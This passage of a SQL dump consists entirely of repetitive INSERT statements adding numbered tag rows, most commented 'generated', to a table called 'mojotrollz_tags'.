VALUES (48413, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48413, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48414, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48414, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48415, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48415, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48416, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48416, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48417, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48417, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48418, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48418, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48419, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48419, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48420, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48420, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48421, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48421, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48422, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48422, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48423, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48423, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48424, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48424, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48425, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48425, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48426, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48426, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48427, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48427, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48428, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48428, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48429, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48429, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48430, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48430, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48431, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48431, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48432, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48432, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48433, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48433, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48434, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48434, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48435, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48435, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48436, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48436, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48437, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48437, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48438, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48438, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48439, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48439, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48440, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48440, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48442, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48442, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48443, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48443, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48444, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48444, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48445, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48445, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48446, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48446, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48447, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48447, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48448, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48448, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48450, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48450, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48451, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48451, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48452, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48452, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48453, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48453, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48454, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48454, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48455, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48455, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48457, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48457, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48458, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48458, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48459, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48459, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48460, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48460, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48461, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48461, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48462, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48462, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48463, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48463, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48464, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48464, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48465, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48465, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48466, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48466, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48467, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48467, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48468, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48468, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48469, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48469, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48470, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48470, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48471, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48471, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48472, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48472, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48473, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48473, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48474, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48474, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48475, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48475, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48476, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48476, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48477, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48477, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48478, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48478, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48479, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48479, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48480, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48480, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48481, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48481, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48482, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48482, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48483, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48483, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48484, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48484, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48485, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48485, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48486, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48486, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48487, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48487, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48488, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48488, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48489, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48489, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48490, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48490, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48491, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48491, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48492, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48492, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48493, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48493, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48494, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48494, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48495, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48495, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48496, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48496, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48497, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48497, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48498, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48498, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48500, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48500, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48501, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48501, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48502, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48502, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48503, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48503, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48504, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48504, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48505, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48505, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48506, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48506, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48507, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48507, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48508, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48508, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48509, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48509, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48510, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48510, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48511, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48511, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48512, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48512, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48513, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48513, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48514, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48514, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48515, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48515, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48516, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48517, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48518, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48519, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48520, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48521, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48522, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48523, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48524, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48525, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48526, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48527, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48528, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48529, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48530, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48531, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48532, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48533, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48534, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48535, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48536, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48537, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48538, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48539, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48540, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48541, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48542, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48543, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48544, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48545, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48546, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48547, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48548, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48549, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48550, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48551, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48552, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48553, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48554, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48555, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48556, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48557, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` 